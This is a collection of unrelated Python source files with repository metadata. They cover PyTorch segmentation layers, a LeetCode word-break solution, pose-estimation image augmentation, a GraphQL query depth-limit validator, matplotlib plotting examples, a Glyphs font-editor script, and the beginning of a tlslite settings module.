| 2,762
| 627
|
Apache-2.0
| 2023-01-04T08:24:28
| 2019-03-11T01:33:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,079
|
py
|
basic.py
|
"""Basic Module for Semantic Segmentation"""
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['_ConvBNPReLU', '_ConvBN', '_BNPReLU', '_ConvBNReLU', '_DepthwiseConv', 'InvertedResidual']
class _ConvBNReLU(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, relu6=False, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBNReLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
self.relu = nn.ReLU6(True) if relu6 else nn.ReLU(True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
class _ConvBNPReLU(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBNPReLU, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
self.prelu = nn.PReLU(out_channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.prelu(x)
return x
class _ConvBN(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, norm_layer=nn.BatchNorm2d, **kwargs):
super(_ConvBN, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias=False)
self.bn = norm_layer(out_channels)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
return x
class _BNPReLU(nn.Module):
def __init__(self, out_channels, norm_layer=nn.BatchNorm2d, **kwargs):
super(_BNPReLU, self).__init__()
self.bn = norm_layer(out_channels)
self.prelu = nn.PReLU(out_channels)
def forward(self, x):
x = self.bn(x)
x = self.prelu(x)
return x
# -----------------------------------------------------------------
# For PSPNet
# -----------------------------------------------------------------
class _PSPModule(nn.Module):
def __init__(self, in_channels, sizes=(1, 2, 3, 6), **kwargs):
super(_PSPModule, self).__init__()
out_channels = int(in_channels / 4)
self.avgpools = nn.ModuleList()
self.convs = nn.ModuleList()
for size in sizes:
self.avgpool.append(nn.AdaptiveAvgPool2d(size))
self.convs.append(_ConvBNReLU(in_channels, out_channels, 1, **kwargs))
def forward(self, x):
size = x.size()[2:]
feats = [x]
for (avgpool, conv) in enumerate(zip(self.avgpools, self.convs)):
feats.append(F.interpolate(conv(avgpool(x)), size, mode='bilinear', align_corners=True))
return torch.cat(feats, dim=1)
# -----------------------------------------------------------------
# For MobileNet
# -----------------------------------------------------------------
class _DepthwiseConv(nn.Module):
"""conv_dw in MobileNet"""
def __init__(self, in_channels, out_channels, stride, norm_layer=nn.BatchNorm2d, **kwargs):
super(_DepthwiseConv, self).__init__()
self.conv = nn.Sequential(
_ConvBNReLU(in_channels, in_channels, 3, stride, 1, groups=in_channels, norm_layer=norm_layer),
_ConvBNReLU(in_channels, out_channels, 1, norm_layer=norm_layer))
def forward(self, x):
return self.conv(x)
# -----------------------------------------------------------------
# For MobileNetV2
# -----------------------------------------------------------------
class InvertedResidual(nn.Module):
def __init__(self, in_channels, out_channels, stride, expand_ratio, norm_layer=nn.BatchNorm2d, **kwargs):
super(InvertedResidual, self).__init__()
assert stride in [1, 2]
self.use_res_connect = stride == 1 and in_channels == out_channels
layers = list()
inter_channels = int(round(in_channels * expand_ratio))
if expand_ratio != 1:
# pw
layers.append(_ConvBNReLU(in_channels, inter_channels, 1, relu6=True, norm_layer=norm_layer))
layers.extend([
# dw
_ConvBNReLU(inter_channels, inter_channels, 3, stride, 1,
groups=inter_channels, relu6=True, norm_layer=norm_layer),
# pw-linear
nn.Conv2d(inter_channels, out_channels, 1, bias=False),
norm_layer(out_channels)])
self.conv = nn.Sequential(*layers)
def forward(self, x):
if self.use_res_connect:
return x + self.conv(x)
else:
return self.conv(x)
if __name__ == '__main__':
x = torch.randn(1, 32, 64, 64)
model = InvertedResidual(32, 64, 2, 1)
out = model(x)
|
1afeb019c80753a5b262c2cf05db5ccc19ab85e2
|
3779caa500c53f0ee12baa039cda4cde1e7391b9
|
/Word Break.py
|
531b91df28756cdcaf4e98290c8612f6ab573cc2
|
[] |
no_license
|
kongzhidea/leetcode
|
924d66bcbc8b7b0f793399184870d4f8da309dba
|
57fc31718ee9cd6a4282c752382e538e42ff02ce
|
refs/heads/master
| 2021-10-29T07:07:41.603363
| 2021-10-27T13:49:29
| 2021-10-27T13:49:29
| 63,241,496
| 125
| 2
| null | null | null | null |
GB18030
|
Python
| false
| false
| 513
|
py
|
Word Break.py
|
class Solution:
# @param s, a string
# @param dict, a set of string
# @return a boolean
def wordBreak(self, s, dict):
n = len(s)
f = [0] * n #f[i]表示 是否可以由dict组成
for i in xrange(n):
if s[0:i+1] in dict:
f[i] = 1
if f[i] == 1:
continue
for j in xrange(i):
if f[j] == 1:
if s[j+1:i+1] in dict:
f[i] = 1
return f[n-1] == 1
|
be22892eeaa8049bf9a1919792cff0b5d310c041
|
42fe96c0a0c55c1f8428a3c856b40ccce74b6173
|
/multi_obj_pose_estimation/image_multi.py
|
e26348329b65cfcf61f75ec4662430188ebd0bc3
|
[
"MIT"
] |
permissive
|
microsoft/singleshotpose
|
4a8a1da8087ab6a0bc13a54d263e31b26b3a75a5
|
2c282619101f9f31666dd18b42393375bea1600f
|
refs/heads/master
| 2023-08-25T19:40:50.381498
| 2022-11-28T19:11:09
| 2022-11-28T19:11:09
| 139,270,056
| 475
| 138
|
MIT
| 2022-11-28T19:11:10
| 2018-06-30T18:09:05
|
Python
|
UTF-8
|
Python
| false
| false
| 14,148
|
py
|
image_multi.py
|
#!/usr/bin/python
# encoding: utf-8
import random
import os
from PIL import Image, ImageChops, ImageMath
import numpy as np
def get_add_objs(objname):
# Decide how many additional objects you will augment and what will be the other types of objects
if objname == 'ape':
add_objs = ['can', 'cat', 'duck', 'glue', 'holepuncher', 'iron', 'phone'] # eggbox
elif objname == 'benchvise':
add_objs = ['ape', 'can', 'cat', 'driller', 'duck', 'glue', 'holepuncher']
elif objname == 'cam':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'driller', 'duck', 'holepuncher']
elif objname == 'can':
add_objs = ['ape', 'benchvise', 'cat', 'driller', 'duck', 'eggbox', 'holepuncher']
elif objname == 'cat':
add_objs = ['ape', 'can', 'duck', 'glue', 'holepuncher', 'eggbox', 'phone']
elif objname == 'driller':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'duck', 'glue', 'holepuncher']
elif objname == 'duck':
add_objs = ['ape', 'can', 'cat', 'eggbox', 'glue', 'holepuncher', 'phone']
elif objname == 'eggbox':
add_objs = ['ape', 'benchvise', 'cam', 'can', 'cat', 'duck', 'glue', 'holepuncher']
elif objname == 'glue':
add_objs = ['ape', 'benchvise', 'cam', 'driller', 'duck', 'eggbox', 'holepuncher' ]
elif objname == 'holepuncher':
add_objs = ['benchvise', 'cam', 'can', 'cat', 'driller', 'duck', 'eggbox']
elif objname == 'iron':
add_objs = ['ape', 'benchvise', 'can', 'cat', 'driller', 'duck', 'glue']
elif objname == 'lamp':
add_objs = ['ape', 'benchvise', 'can', 'driller', 'eggbox', 'holepuncher', 'iron']
elif objname == 'phone':
add_objs = ['ape', 'benchvise', 'cam', 'can', 'driller', 'duck', 'holepuncher']
return add_objs
def mask_background(img, mask):
ow, oh = img.size
imcs = list(img.split())
maskcs = list(mask.split())
fics = list(Image.new(img.mode, img.size).split())
for c in range(len(imcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c", a=imcs[c], c=posmask).convert('L')
out = Image.merge(img.mode, tuple(fics))
return out
def scale_image_channel(im, c, v):
cs = list(im.split())
cs[c] = cs[c].point(lambda i: i * v)
out = Image.merge(im.mode, tuple(cs))
return out
def distort_image(im, hue, sat, val):
im = im.convert('HSV')
cs = list(im.split())
cs[1] = cs[1].point(lambda i: i * sat)
cs[2] = cs[2].point(lambda i: i * val)
def change_hue(x):
x += hue*255
if x > 255:
x -= 255
if x < 0:
x += 255
return x
cs[0] = cs[0].point(change_hue)
im = Image.merge(im.mode, tuple(cs))
im = im.convert('RGB')
return im
def rand_scale(s):
scale = random.uniform(1, s)
if(random.randint(1,10000)%2):
return scale
return 1./scale
def random_distort_image(im, hue, saturation, exposure):
dhue = random.uniform(-hue, hue)
dsat = rand_scale(saturation)
dexp = rand_scale(exposure)
res = distort_image(im, dhue, dsat, dexp)
return res
def data_augmentation(img, shape, jitter, hue, saturation, exposure):
oh = img.height
ow = img.width
dw =int(ow*jitter)
dh =int(oh*jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
dx = (float(pleft)/ow)/sx
dy = (float(ptop) /oh)/sy
sized = cropped.resize(shape)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
img = random_distort_image(sized, hue, saturation, exposure)
return img, flip, dx,dy,sx,sy
def fill_truth_detection(labpath, w, h, flip, dx, dy, sx, sy, num_keypoints, max_num_gt):
num_labels = 2*num_keypoints+3 # +2 for width, height, +1 for class label
label = np.zeros((max_num_gt,num_labels))
if os.path.getsize(labpath):
bs = np.loadtxt(labpath)
if bs is None:
return label
bs = np.reshape(bs, (-1, num_labels))
cc = 0
for i in range(bs.shape[0]):
xs = list()
ys = list()
for j in range(num_keypoints):
xs.append(bs[i][2*j+1])
ys.append(bs[i][2*j+2])
# Make sure the centroid of the object/hand is within image
xs[0] = min(0.999, max(0, xs[0] * sx - dx))
ys[0] = min(0.999, max(0, ys[0] * sy - dy))
for j in range(1,num_keypoints):
xs[j] = xs[j] * sx - dx
ys[j] = ys[j] * sy - dy
for j in range(num_keypoints):
bs[i][2*j+1] = xs[j]
bs[i][2*j+2] = ys[j]
min_x = min(xs);
max_x = max(xs);
min_y = min(ys);
max_y = max(ys);
bs[i][2*num_keypoints+1] = max_x - min_x;
bs[i][2*num_keypoints+2] = max_y - min_y;
label[cc] = bs[i]
cc += 1
if cc >= max_num_gt:
break
label = np.reshape(label, (-1))
return label
def change_background(img, mask, bg):
ow, oh = img.size
bg = bg.resize((ow, oh)).convert('RGB')
imcs = list(img.split())
bgcs = list(bg.split())
maskcs = list(mask.split())
fics = list(Image.new(img.mode, img.size).split())
for c in range(len(imcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c + b * d", a=imcs[c], b=bgcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(img.mode, tuple(fics))
return out
def shifted_data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure):
ow, oh = img.size
dw =int(ow*jitter)
dh =int(oh*jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
mask_cropped = mask.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
cw, ch = cropped.size
shift_x = random.randint(-80, 80)
shift_y = random.randint(-80, 80)
dx = (float(pleft)/ow)/sx - (float(shift_x)/shape[0]) # FIX HERE
dy = (float(ptop) /oh)/sy - (float(shift_y)/shape[1]) # FIX HERE
# dx = (float(pleft)/ow)/sx - (float(shift_x)/ow)
# dy = (float(ptop) /oh)/sy - (float(shift_y)/oh)
sized = cropped.resize(shape)
mask_sized = mask_cropped.resize(shape)
sized = ImageChops.offset(sized, shift_x, shift_y)
mask_sized = ImageChops.offset(mask_sized, shift_x, shift_y)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
mask_sized = mask_sized.transpose(Image.FLIP_LEFT_RIGHT)
img = sized
mask = mask_sized
return img, mask, flip, dx,dy,sx,sy
def data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure):
ow, oh = img.size
dw =int(ow*jitter)
dh =int(oh*jitter)
pleft = random.randint(-dw, dw)
pright = random.randint(-dw, dw)
ptop = random.randint(-dh, dh)
pbot = random.randint(-dh, dh)
swidth = ow - pleft - pright
sheight = oh - ptop - pbot
sx = float(swidth) / ow
sy = float(sheight) / oh
flip = random.randint(1,10000)%2
cropped = img.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
mask_cropped = mask.crop( (pleft, ptop, pleft + swidth - 1, ptop + sheight - 1))
dx = (float(pleft)/ow)/sx
dy = (float(ptop) /oh)/sy
sized = cropped.resize(shape)
mask_sized = mask_cropped.resize(shape)
if flip:
sized = sized.transpose(Image.FLIP_LEFT_RIGHT)
mask_sized = mask_sized.transpose(Image.FLIP_LEFT_RIGHT)
img = sized
mask = mask_sized
return img, mask, flip, dx,dy,sx,sy
def superimpose_masked_imgs(masked_img, mask, total_mask):
ow, oh = masked_img.size
total_mask = total_mask.resize((ow, oh)).convert('RGB')
imcs = list(masked_img.split())
bgcs = list(total_mask.split())
maskcs = list(mask.split())
fics = list(Image.new(masked_img.mode, masked_img.size).split())
for c in range(len(imcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i / 255)
fics[c] = ImageMath.eval("a * c + b * d", a=imcs[c], b=bgcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(masked_img.mode, tuple(fics))
return out
def superimpose_masks(mask, total_mask):
# bg: total_mask
ow, oh = mask.size
total_mask = total_mask.resize((ow, oh)).convert('RGB')
total_maskcs = list(total_mask.split())
maskcs = list(mask.split())
fics = list(Image.new(mask.mode, mask.size).split())
for c in range(len(maskcs)):
negmask = maskcs[c].point(lambda i: 1 - i / 255)
posmask = maskcs[c].point(lambda i: i)
fics[c] = ImageMath.eval("c + b * d", b=total_maskcs[c], c=posmask, d=negmask).convert('L')
out = Image.merge(mask.mode, tuple(fics))
return out
def augment_objects(imgpath, objname, add_objs, shape, jitter, hue, saturation, exposure, num_keypoints, max_num_gt):
pixelThreshold = 200
num_labels = 2*num_keypoints+3
random.shuffle(add_objs)
labpath = imgpath.replace('images', 'labels').replace('JPEGImages', 'labels').replace('.jpg', '.txt').replace('.png','.txt')
maskpath = imgpath.replace('JPEGImages', 'mask').replace('/00', '/').replace('.jpg', '.png')
# Read the image and the mask
img = Image.open(imgpath).convert('RGB')
iw, ih = img.size
mask = Image.open(maskpath).convert('RGB')
img,mask,flip,dx,dy,sx,sy = shifted_data_augmentation_with_mask(img, mask, shape, jitter, hue, saturation, exposure)
label = fill_truth_detection(labpath, iw, ih, flip, dx, dy, 1./sx, 1./sy, num_keypoints, max_num_gt)
total_label = np.reshape(label, (-1, num_labels))
# Mask the background
masked_img = mask_background(img, mask)
mask = mask.resize(shape)
masked_img = masked_img.resize(shape)
# Initialize the total mask and total masked image
total_mask = mask
total_masked_img = masked_img
count = 1
for obj in add_objs:
successful = False
while not successful:
objpath = '../LINEMOD/' + obj + '/train.txt'
with open(objpath, 'r') as objfile:
objlines = objfile.readlines()
rand_index = random.randint(0, len(objlines) - 1)
obj_rand_img_path = '../' + objlines[rand_index].rstrip()
obj_rand_mask_path = obj_rand_img_path.replace('JPEGImages', 'mask').replace('/00', '/').replace('.jpg', '.png')
obj_rand_lab_path = obj_rand_img_path.replace('images', 'labels').replace('JPEGImages', 'labels').replace('.jpg', '.txt').replace('.png','.txt')
obj_rand_img = Image.open(obj_rand_img_path).convert('RGB')
obj_rand_mask = Image.open(obj_rand_mask_path).convert('RGB')
obj_rand_masked_img = mask_background(obj_rand_img, obj_rand_mask)
obj_rand_masked_img,obj_rand_mask,flip,dx,dy,sx,sy = data_augmentation_with_mask(obj_rand_masked_img, obj_rand_mask, shape, jitter, hue, saturation, exposure)
obj_rand_label = fill_truth_detection(obj_rand_lab_path, iw, ih, flip, dx, dy, 1./sx, 1./sy, num_keypoints, max_num_gt)
# compute intersection (ratio of the object part intersecting with other object parts over the area of the object)
xx = np.array(obj_rand_mask)
xx = np.where(xx > pixelThreshold, 1, 0)
yy = np.array(total_mask)
yy = np.where(yy > pixelThreshold, 1, 0)
intersection = (xx * yy)
if (np.sum(xx) < 0.01) and (np.sum(xx) > -0.01):
successful = False
continue
intersection_ratio = float(np.sum(intersection)) / float(np.sum(xx))
if intersection_ratio < 0.2:
successful = True
total_mask = superimpose_masks(obj_rand_mask, total_mask) # total_mask + obj_rand_mask
total_masked_img = superimpose_masked_imgs(obj_rand_masked_img, obj_rand_mask, total_masked_img) # total_masked_img + obj_rand_masked_img
obj_rand_label = np.reshape(obj_rand_label, (-1, num_labels))
total_label[count, :] = obj_rand_label[0, :]
count = count + 1
else:
successful = False
total_masked_img = superimpose_masked_imgs(masked_img, mask, total_masked_img)
return total_masked_img, np.reshape(total_label, (-1)), total_mask
def load_data_detection(imgpath, shape, jitter, hue, saturation, exposure, bgpath, num_keypoints, max_num_gt):
# Read the background image
bg = Image.open(bgpath).convert('RGB')
# Understand which object it is and get the neighboring objects
dirname = os.path.dirname(os.path.dirname(imgpath)) ## dir of dir of file
objname = os.path.basename(dirname)
add_objs = get_add_objs(objname)
num_labels = 2*num_keypoints+3
# Add additional objects in the scene, apply data augmentation on the objects
total_masked_img, label, total_mask = augment_objects(imgpath, objname, add_objs, shape, jitter, hue, saturation, exposure, num_keypoints, max_num_gt)
img = change_background(total_masked_img, total_mask, bg)
lb = np.reshape(label, (-1, num_labels))
return img,label
|
523ed78ab472dc923f58eab7dcfc9a5d729296c0
|
fda6a1be714d8e27a5d8dd3df795df45538f2fe7
|
/graphene/validation/depth_limit.py
|
e0f286634fa19b08129ff9a81fe0d5f952884250
|
[
"MIT"
] |
permissive
|
graphql-python/graphene
|
6badaaa97c8ad78552a656f9da9ed577cfc37add
|
93cb33d359bf2109d1b81eaeaf052cdb06f93f49
|
refs/heads/master
| 2023-08-05T02:48:36.967050
| 2023-07-26T07:43:40
| 2023-07-26T07:43:40
| 43,056,951
| 8,187
| 1,088
|
MIT
| 2023-09-01T19:59:19
| 2015-09-24T09:18:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,504
|
py
|
depth_limit.py
|
# This is a Python port of https://github.com/stems/graphql-depth-limit
# which is licensed under the terms of the MIT license, reproduced below.
#
# -----------
#
# MIT License
#
# Copyright (c) 2017 Stem
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
try:
from re import Pattern
except ImportError:
# backwards compatibility for v3.6
from typing import Pattern
from typing import Callable, Dict, List, Optional, Union, Tuple
from graphql import GraphQLError
from graphql.validation import ValidationContext, ValidationRule
from graphql.language import (
DefinitionNode,
FieldNode,
FragmentDefinitionNode,
FragmentSpreadNode,
InlineFragmentNode,
Node,
OperationDefinitionNode,
)
from ..utils.is_introspection_key import is_introspection_key
IgnoreType = Union[Callable[[str], bool], Pattern, str]
def depth_limit_validator(
max_depth: int,
ignore: Optional[List[IgnoreType]] = None,
callback: Optional[Callable[[Dict[str, int]], None]] = None,
):
class DepthLimitValidator(ValidationRule):
def __init__(self, validation_context: ValidationContext):
document = validation_context.document
definitions = document.definitions
fragments = get_fragments(definitions)
queries = get_queries_and_mutations(definitions)
query_depths = {}
for name in queries:
query_depths[name] = determine_depth(
node=queries[name],
fragments=fragments,
depth_so_far=0,
max_depth=max_depth,
context=validation_context,
operation_name=name,
ignore=ignore,
)
if callable(callback):
callback(query_depths)
super().__init__(validation_context)
return DepthLimitValidator
def get_fragments(
definitions: Tuple[DefinitionNode, ...],
) -> Dict[str, FragmentDefinitionNode]:
fragments = {}
for definition in definitions:
if isinstance(definition, FragmentDefinitionNode):
fragments[definition.name.value] = definition
return fragments
# This will actually get both queries and mutations.
# We can basically treat those the same
def get_queries_and_mutations(
definitions: Tuple[DefinitionNode, ...],
) -> Dict[str, OperationDefinitionNode]:
operations = {}
for definition in definitions:
if isinstance(definition, OperationDefinitionNode):
operation = definition.name.value if definition.name else "anonymous"
operations[operation] = definition
return operations
def determine_depth(
node: Node,
fragments: Dict[str, FragmentDefinitionNode],
depth_so_far: int,
max_depth: int,
context: ValidationContext,
operation_name: str,
ignore: Optional[List[IgnoreType]] = None,
) -> int:
if depth_so_far > max_depth:
context.report_error(
GraphQLError(
f"'{operation_name}' exceeds maximum operation depth of {max_depth}.",
[node],
)
)
return depth_so_far
if isinstance(node, FieldNode):
should_ignore = is_introspection_key(node.name.value) or is_ignored(
node, ignore
)
if should_ignore or not node.selection_set:
return 0
return 1 + max(
map(
lambda selection: determine_depth(
node=selection,
fragments=fragments,
depth_so_far=depth_so_far + 1,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
),
node.selection_set.selections,
)
)
elif isinstance(node, FragmentSpreadNode):
return determine_depth(
node=fragments[node.name.value],
fragments=fragments,
depth_so_far=depth_so_far,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
)
elif isinstance(
node, (InlineFragmentNode, FragmentDefinitionNode, OperationDefinitionNode)
):
return max(
map(
lambda selection: determine_depth(
node=selection,
fragments=fragments,
depth_so_far=depth_so_far,
max_depth=max_depth,
context=context,
operation_name=operation_name,
ignore=ignore,
),
node.selection_set.selections,
)
)
else:
raise Exception(
f"Depth crawler cannot handle: {node.kind}."
) # pragma: no cover
def is_ignored(node: FieldNode, ignore: Optional[List[IgnoreType]] = None) -> bool:
if ignore is None:
return False
for rule in ignore:
field_name = node.name.value
if isinstance(rule, str):
if field_name == rule:
return True
elif isinstance(rule, Pattern):
if rule.match(field_name):
return True
elif callable(rule):
if rule(field_name):
return True
else:
raise ValueError(f"Invalid ignore option: {rule}.")
return False
|
008da3d6bd94988f02960e16f766d460cf91482d
|
767c07db1fb131047af3d9b0a065b8fdc8aac9ab
|
/73-mpl/mpl_bar.py
|
94ddfef81b6bbbfb9ef6d813cdc02e43525160fc
|
[] |
no_license
|
DUanalytics/pyAnalytics
|
e52c5469da30a5f436ec0f3120d9f15fb82fd9b3
|
107a08bebe46ea51afccfeae4a666213bb405d41
|
refs/heads/master
| 2023-07-08T04:32:54.758902
| 2023-07-03T14:37:04
| 2023-07-03T14:37:04
| 202,094,535
| 394
| 31
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,737
|
py
|
mpl_bar.py
|
#MPL - graph with titles
#Graph and Plots
#-----------------------------
#%
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
plt.bar(['M','F'], [30,10])
plt.barh(['M','F'], [30,10])
plt.bar(['M','F'], [30,10], color = ['r', 'g'])
#with other options : run together till plt.show
plt.bar(['M','F'], [30,10], color = ['r', 'g'])
plt.title("Student Proportion")
plt.grid(True)
plt.show(); #used if running as file
#now create a dataframe object
df = pd.DataFrame({'gender':['M','F'], 'strength':[25,10]})
df
df.plot(kind='bar') #legend, labels ?
#save in object
ax = df.plot(kind='bar', grid=True, legend=True, title=' Title of Graph', figsize=[10,5])
ax.set_xlabel('Gender')
ax.set_ylabel('Gender')
#M2
plt.bar(df.gender, df.strength) #use column anmes
plt.bar(df.gender, df.strength, color = ['red','g']) #list color
plt.bar(df.gender, df.strength, color = ('red','g')) #tuple color
#complete plot
plt.bar(df.gender, df.strength, color = ['red','g'])
plt.title('Str of Students')
plt.grid(True)
plt.xlabel('Gender')
plt.ylabel('Count')
plt.xticks(df.gender,rotation=45,fontsize=20)
plt.yticks([0,5,10,15,20,25,30],rotation=45,fontsize=20)
plt.bar(df)
#what if both columns are numeric
# x axis values
x = [1,2,3,4,5,6]
# corresponding y axis values
y = [2,4,1,5,2,6]
plt.plot(x,y)
# plotting the points
plt.plot(x, y, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
# setting x and y axis range
plt.ylim(1,8)
plt.xlim(1,8)
# naming the x axis
plt.xlabel('x - axis')
# naming the y axis
plt.ylabel('y - axis')
# giving a title to my graph
plt.title('Some cool customizations!')
# function to show the plot
plt.show()
|
7f02a57e9ce5921ef4e0fa300b15dfa92f1697a5
|
23895eba556353a116d97a3e9fa60f7ed9c9f693
|
/Paths/Grid Switcher.py
|
d92ab7058b83fc7f8766c08c897728de9e7510e3
|
[
"Apache-2.0"
] |
permissive
|
mekkablue/Glyphs-Scripts
|
9970200e6b7223be58ff9122dd519af176f210de
|
fe09b4cf3754bc10c3037c3312a19c1b909a74d6
|
refs/heads/master
| 2023-08-28T15:02:21.931491
| 2023-08-25T17:12:34
| 2023-08-25T17:12:34
| 2,517,418
| 322
| 108
|
Apache-2.0
| 2023-08-15T15:24:50
| 2011-10-05T07:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
Grid Switcher.py
|
#MenuTitle: Grid Switcher
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__ = """
Toggles grid between two gridstep values.
"""
import vanilla
class GridOnOff(object):
def __init__(self):
self.gridStep1default = 1
self.gridStep2default = 0
currentGridStep = Glyphs.font.gridMain()
self.w = vanilla.FloatingWindow((170, 100), "Grid Switcher", autosaveName="com.mekkablue.GridOnOff.mainwindow")
self.w.grid1 = vanilla.EditText((15, 12, 65, 15 + 3), "1", sizeStyle='small')
self.w.grid2 = vanilla.EditText((-80, 12, -15, 15 + 3), "50", sizeStyle='small')
self.w.currentGridStep = vanilla.TextBox((15, 38, -15, 22), "Current Grid Step: %i" % currentGridStep, sizeStyle='regular')
self.w.switchButton = vanilla.Button((15, -22 - 15, -15, -15), "Switch Grid", sizeStyle='regular', callback=self.GridOnOffMain)
self.w.setDefaultButton(self.w.switchButton)
self.w.center()
self.w.open()
self.w.makeKey()
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Grid Switcher' could not load preferences. Will resort to defaults")
def GridOnOffMain(self, sender):
try:
if not self.SavePreferences(self):
print("Note: 'Grid Switcher' could not write preferences.")
try:
gridStep1 = int(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
except:
gridStep1 = self.gridStep1default
self.w.grid1.set(gridStep1)
try:
gridStep2 = int(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
except:
gridStep2 = self.gridStep2default
self.w.grid2.set(gridStep2)
gridStep = Glyphs.font.gridMain()
if gridStep != gridStep1:
newGridStep = gridStep1
else:
newGridStep = gridStep2
Glyphs.font.setGridMain_(newGridStep)
self.w.currentGridStep.set("Current Grid Step: %i" % newGridStep)
except Exception as e:
raise e
def SavePreferences(self, sender):
try:
Glyphs.defaults["com.mekkablue.gridswitch.grid1"] = self.w.grid1.get()
Glyphs.defaults["com.mekkablue.gridswitch.grid2"] = self.w.grid2.get()
except:
return False
return True
def LoadPreferences(self):
try:
Glyphs.registerDefault("com.mekkablue.gridswitch.grid1", 1)
Glyphs.registerDefault("com.mekkablue.gridswitch.grid2", 0)
self.w.grid1.set(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
self.w.grid2.set(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
try:
self.gridStep1default = int(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
self.gridStep2default = int(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
except:
pass
except:
return False
return True
GridOnOff()
|
591b30947d782f1957e0862a086b400b78e2a0a5
|
0f89cda6f3ae5092e0b44b9441fd93b5a2d4a703
|
/code/default/lib/noarch/tlslite/handshakesettings.py
|
352a566de330db58a8b5ae55bed9bbf6d8789f43
|
[
"BSD-2-Clause"
] |
permissive
|
XX-net/XX-Net
|
ef59074e7dd67d1334c59bb076519bb796db4f4e
|
541f58da464296001109f9cfbb879256957b3819
|
refs/heads/master
| 2023-08-28T04:56:16.921687
| 2023-08-27T06:17:05
| 2023-08-27T06:17:32
| 29,290,473
| 40,250
| 11,454
| null | 2023-04-28T15:12:20
| 2015-01-15T09:35:51
|
Python
|
UTF-8
|
Python
| false
| false
| 32,163
|
py
|
handshakesettings.py
|
# Authors:
# Trevor Perrin
# Dave Baggett (Arcode Corporation) - cleanup handling of constants
# Yngve Pettersen (ported by Paul Sokolovsky) - TLS 1.2
#
# See the LICENSE file for legal information regarding use of this file.
"""Class for setting handshake parameters."""
from .constants import CertificateType
from .utils import cryptomath
from .utils import cipherfactory
from .utils.compat import ecdsaAllCurves, int_types
CIPHER_NAMES = ["chacha20-poly1305",
"aes256gcm", "aes128gcm",
